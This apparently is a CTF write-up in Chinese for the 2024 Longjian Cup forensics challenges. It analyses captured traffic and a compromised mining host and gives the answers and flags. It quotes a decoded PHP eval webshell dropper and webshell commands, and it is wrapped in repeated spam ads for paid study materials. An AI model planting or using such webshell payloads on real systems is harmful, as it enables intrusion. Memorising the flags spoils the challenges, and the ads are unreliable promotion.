2024陇剑杯答题笔记（更新中）(1)，2024年最新网络安全大厂面试真题解析大全

先自我介绍一下，小编浙江大学毕业，去过华为、字节跳动等大厂，目前阿里P7

深知大多数程序员，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年最新网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较多，这里只是将部分目录截图出来，全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频，并且后续会持续更新

如果你需要这些资料，可以添加V获取：vip204888 （备注网络安全）

正文

观察到这是一个telnet通信，于是追踪数据包  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/8493e08d539d4bd3971ddcf810a241da.png)可以看到口令为 **youcannevergetthis**  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/aab3b5eccc024a149d75c943e4a67e7b.png)


### Wireshark1\_3


题目：

用户目录下第二个文件夹的名称是？

继续观察上一题的流量包，可以看到有文件夹列表，第二个为**Downloads**  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/3166b890eac14230817b222c68719175.png)


### Wireshark1\_4


题目：

/etc/passwd中倒数第二个用户的用户名是？

从这里可以知道后面的内容是/etc/passwd文件内容，所以倒数第二个是**mysql**  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/52c7fa771af1447b9e85b7b5ea8ec54e.png)


## 数据分析-IR


### IncidentResponse\_1


题目：

你是公司的一名安全运营工程师，今日接到外部监管部门通报，你公司网络出口存在请求挖矿域名的行为。需要立即整改。经过与网络组配合，你们定位到了请求挖矿域名的内网IP是10.221.36.21。查询CMDB后得知该IP运行了公司的工时系统。（虚拟机账号密码为：root/IncidentResponsePasswd） 挖矿程序所在路径是？（答案中如有空格均需去除，如有大写均需变为小写，使用echo -n ‘strings’|md5sum|cut -d ’ ’ -f1获取md5值作为答案）

先通过`ls -la --sort=t`查看近期文件改动  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/341c8168e4234f3d88c9a36a346b2e7a.png)于是我们依次检查这些文件。在.viminfo中发现大量redis操作  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/f947984af05e442aba72553cf77315bb.png)进入redis目录，可以看到redis-server有7万次操作可以确定为挖矿软件  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/ed33f0fc986644668f24b84da5987103.png)于是答案为6f72038a870f05cbf923633066e48881  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/a11e812ac7e04061b07663f0a7a36eaa.png)


### IncidentResponse\_2


题目：

挖矿程序连接的矿池域名是？（答案中如有空格均需去除，如有大写均需变为小写，使用echo -n ‘strings’|md5sum|cut -d ’ ’ -f1获取md5值作为答案）

确认挖矿软件后，打开redis配置文件，在里面搜索WALLET，可以找到如下配置  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/8141ed85c21a45cb997a2aff1496d742.png)于是矿池为donate.v2.xmrig.com，答案为**3fca20bb92d0ed67714e68704a0a4503**


### IncidentResponse\_3

攻击者入侵服务器的利用的方法是？（答案中如有空格均需去除，如有大写均需变为小写，使用echo -n ‘strings’|md5sum|cut -d ’ ’ -f1获取md5值作为答案）

之前查看.bash\_history时注意到有一个renren-admin.jar运行了nohup服务（即后台运行）  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/2da618f8295c48e6bf167532e92c946b.png)注意到/home/app/下有此jar包且运行次数非常高，于是我们检查nohub.log  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/5eabaeb143e14ead8629f3dc87296c81.png)多处发现shiro关键字，推测为[shiro反序列化漏洞]( )。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/3518d471d5eb4e7ab2e7e30b03efcf19.png)![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/fac1383997024908b478f9eccebb4c0b.png)所以答案为shirodeserialization，转化为标准格式后得到**3ee726cb32f87a15d22fe55fa04c4dcd**


### IncidentResponse\_4


题目：

攻击者的IP是？（答案中如有空格均需去除，如有大写均需变为小写，使用echo -n ‘strings’|md5sum|cut -d ’ ’ -f1获取md5值作为答案）

检查登录信息，可以发现有一条外网连接，ip为81.70.166.3，所以答案为**c76b4b1a5e8c9e7751af4684c6a8b2c9**  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/e559e9e83ffb49af8f72ca98beab5373.png)


### IncidentResponse\_5


题目：

攻击者发起攻击时使用的User-Agent是？（答案中如有空格均需去除，如有大写均需变为小写，使用echo -n ‘strings’|md5sum|cut -d ’ ’ -f1获取md5值作为答案）

检查Nginx日志（/var/log/nginx/access.log）中查看访问信息，可以在最后找到ua信息为Mozilla/5.0 (compatible; Baiduspider/2.0; +http://baidu.com/search/spider.html)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/bb588f9a615a4732a20f2a847b19b1d7.png)


### IncidentResponse\_6


题目：

攻击者使用了两种权限维持手段，相应的配置文件路径是？(md5加密后以a开头)（答案中如有空格均需去除，如有大写均需变为小写，使用echo -n ‘strings’|md5sum|cut -d ’ ’ -f1获取md5值作为答案）

检查.ssh目录，查看authorized\_keys文件  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/426769e861b94fdfa51a1ea7fbdf8af7.png)  
 在这里发现开启了ssh私钥登录，且用户为root@kali。所以答案为/root/.ssh/authorized\_keys，转化格式后得到**a1fa1b5aeb1f97340032971c342c4258**  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/8e1da20503ee42d0ae464eac3607d6dd.png)


### IncidentResponse\_7


题目：

攻击者使用了两种权限维持手段，相应的配置文件路径是？(md5加密后以b开头)（答案中如有空格均需去除，如有大写均需变为小写，使用echo -n ‘strings’|md5sum|cut -d ’ ’ -f1获取md5值作为答案）

可能是开机自启，所以检查/root/lib/systemd/system/和/etc/systemd/system/，在/root/lib/systemd/system/中找到了redis.service文件。![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/aa8e9247875b482092e0b6324e6c0545.png)查看文件可以发现redis会自启连接矿池。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/31e2e4282014498a856a6f4deffb7649.png)所以答案为/lib/systemd/system/redis.service，转换格式为**b2c5af8ce08753894540331e5a947d35**


## 数据分析-SSW


### SmallSword\_1


题目：

连接蚁剑的正确密码是______________?（答案示例：123asd）

首先过滤http包，注意到如下流量，形如蚁剑一句话木马，选择追踪流量。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/1830cf31f9914b17907fcfd6ca09cdf8.png)可以在$\_POST中找到连接密码**6ea280898e404bfabd0ebb702327b18f**，其中`%22`代表双引号。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/4d5655958a2e4951954d9a2fe251f086.png)


### SmallSword\_2


题目：

攻击者留存的值是______________?(答案示例：d1c3f0d3-68bb-4d85-a337-fb97cf99ee2e)

检查蚁剑流量，并用Base64解码  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/ffd6a14447da4b3e9a83e087cef50230.png)在这个流量包中发现上传如下值  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/6379d973bf0e418bb39e404ef5f547cc.png)解码后得到ad6269b7-3ce2-4ae8-b97f-f259515e7a91 ，即为答案。


### SmallSword\_3


题目：

攻击者下载到的flag是______________?(答案示例：flag3{uuid})

待更


## 数据分析-EW


### ez\_web\_1


题目：

服务器自带的后门文件名是什么？（含文件后缀）

后门文件需要上传，所以我们过滤POST请求，得到以下流量  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/7024f35f54614d8ba93afcbd78501203.png)可以发现d00r.php为后门文件。但我们检查第一个流量`a=file_put_contents%28%27d00r.php%27%2C+base64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs%2FPg%3D%3D%27%29%29%3B`,可转译为`a=file_put_contents(‘d00r.php’,+base64_decode(‘<?php eval($_POST['cmd']);?>’);`  
 可以发现是ViewMore.php上传的d00r.php文件。所以真正的后门文件为**ViewMore.php**  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/61eb8adedfcb4e579d34ed1d928909cf.png)


### ez\_web\_2


题目：

服务器的内网IP是多少？

依次检查d00r.php流量包，在其中一个找到了`system%28%27ifconfig%27%29%3B`即`system('ifconfig');`  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/c994aa07f6d34dc4bc2a8fe8d49f17e4.png)所以下面的响应数据为ip地址，内网ip为**192.168.101.132**


### ez\_web\_3


题目：

攻击者往服务器中写入的key是什么？

继续先后检查流量包，发现如下命令  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/3c495e5ab9c74e7ba69b630802afa952.png)推测为上传key\_file文件，使用base64解码后面的数据得到一串编码。值得注意的是%27为`'`%28为`(`%29为`)`所以有效编码为它们中间的部分，并且需要替换编码中的字符%2F为`/`%3D为`=`。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/e7ccee2d38734f5eba78b74e05706abd.png)将其保存为zip文件并解压，提示需要密码。向上查看流量包，找到如下命令：  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/f7e90fe571fe4410ad2410b3a77933e3.png)  
 说明密码为7e03864b0db7e6f9。填入压缩文件可以得到key.txt，其中key值为**7d9ddff2-2d67-4eba-9e48-b91c26c42337**


## 数据分析-BF


### baby\_forensics\_1


题目：

磁盘中的key是多少？

待更


### baby\_forensics\_2


题目：

电脑中正在运行的计算器的运行结果是多少？

待更


### baby\_forensics\_3


题目：

该内存文件中存在的flag值是多少？

待更


## 数据分析-TP


### tcpdump\_1


题目：

攻击者通过暴力破解进入了某Wiki 文档，请给出登录的用户名与密码，以:拼接，比如admin:admin

观察登录失败的流量，可以发现服务器返回错误信息是errCode: 300，于是开始寻找返回信息的包。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/183c6328ad954649bc3e82a583c31974.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/c37a19de3a8d4fd18935be6ff3993876.png)


### tcpdump\_2


题目：

攻击者发现软件存在越权漏洞，请给出攻击者越权使用的cookie的内容的md5值。（32位小写）

过滤登录成功的流量，发现有一条数据修改了cookie  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/868b3d6a56d4434ebc82e754e8a96fb5.png)追踪这条流量，可以发现userid变化，说明发生了越权。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/d9b9dea7cd364ad6a035345afdabae1b.png)  
 所以答案为accessToken=f412d3a0378d42439ee016b06ef3330c; zyplayertoken=f412d3a0378d42439ee016b06ef3330cQzw=; userid=1。取md5后得到**383c74db4e32513daaa1eeb1726d7255**


### tcpdump\_3

攻击使用jdbc漏洞读取了应用配置文件，给出配置中的数据库账号密码，以:拼接，比如root:123456

首先过滤含有jdbc、username和password的流量  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/589c255526c843d59a9cbc14cda0b3c8.png)追踪流量可以找到用户名和密码  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/27754c2cbf754530bcce61b5ff6b2004.png)所以答案是**zyplayer:1234567**


### tcpdump\_4


题目：

攻击者又使用了CVE漏洞攻击应用，执行系统命令，请给出此CVE编号以及远程EXP的文件名，使用:拼接，比如CVE-2020-19817:exp.so

这一题使用了JDBC漏洞[CVE-2022-21724]( )，从这里可以看到jdbc连接了postgresql![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/0cf028db4b684a2196a6ff10cf8fd53b.png)可以看到这些流量之后有大量的custom.dtd.xml请求  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/eca4ef9ad1b244ed9934abcd95c1ac9c.png)  
 所以exp文件为custom.dtd.xml，答案为**CVE-2022-21724:custom.dtd.xml**


### tcpdump\_5


题目：

给出攻击者获取系统权限后，下载的工具的名称，比如nmap

可以看到第一次出现custom.dtd.xml的流量是1602，于是开始追踪后续tcp包  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/7d8a6bf20a08438880e389955d46d168.png)在1611中发现如下payload，可以看到其下载了fscan  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/09d5731c8a3545f2bc04e70406e5da8d.png)


## 数据分析-HD


### hacked\_1


题目：

admIn用户的密码是什么？

过滤包含password的流量，可以发现服务器的加密方式为aes，密钥为l36DoqKUYQP0N7e1，iv为131b0c8a7a6e072e，模式为CBC，填充为Pkcs7。接下来开始查询登录信息。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/61fab6e88ead4cb0a030f3e1c366ccf3.png)利用上面的参数加密admIn得到NQq5hKinIsaMmIZ7FCTC0Q==，搜索流量可以查到密码为KGM7NI0/WvKswK+PlmFIhO4gqe8jJzRdOi02GQ0wZoo=  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/85ec7d0a48d3471c82345a44ee7f237a.png)解密后得到**flag{WelC0m5\_TO\_H3re}**


### hacked\_2


题目：





还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！


王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。


对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！


【完整版领取方式在文末！！】


***93道网络安全面试题***


![](https://img-blog.csdnimg.cn/img_convert/6679c89ccd849f9504c48bb02882ef8d.png)








![](https://img-blog.csdnimg.cn/img_convert/07ce1a919614bde78921fb2f8ddf0c2f.png)





![](https://img-blog.csdnimg.cn/img_convert/44238619c3ba2d672b5b8dc4a529b01d.png)





内容实在太多，不一一截图了


### 黑客学习资源推荐


最后给大家分享一份全套的网络安全学习资料，给那些想学习 网络安全的小伙伴们一点帮助！


对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

#### 1️⃣零基础入门


##### ① 学习路线


对于从来没有接触过网络安全的同学，我们帮你准备了详细的**学习成长路线图**。可以说是**最科学最系统的学习路线**，大家跟着这个大的方向学习准没问题。


![image](https://img-blog.csdnimg.cn/img_convert/acb3c4714e29498573a58a3c79c775da.gif#pic_center)


##### ② 路线对应学习视频


同时每个成长路线对应的板块都有配套的视频提供：


![image-20231025112050764](https://img-blog.csdnimg.cn/874ad4fd3dbe4f6bb3bff17885655014.png#pic_center)

**网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。**

**需要这份系统化的资料的朋友，可以添加V获取：vip204888 （备注网络安全）**
![img](https://img-blog.csdnimg.cn/img_convert/b04aae5a56842ae1cef1697a7b13317b.png)

**一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！**



![image](https://img-blog.csdnimg.cn/img_convert/acb3c4714e29498573a58a3c79c775da.gif#pic_center)


##### ② 路线对应学习视频


同时每个成长路线对应的板块都有配套的视频提供：


![image-20231025112050764](https://img-blog.csdnimg.cn/874ad4fd3dbe4f6bb3bff17885655014.png#pic_center)

**网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。**

**需要这份系统化的资料的朋友，可以添加V获取：vip204888 （备注网络安全）**
[外链图片转存中...(img-t7MND0OK-1713111480683)]

**一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！**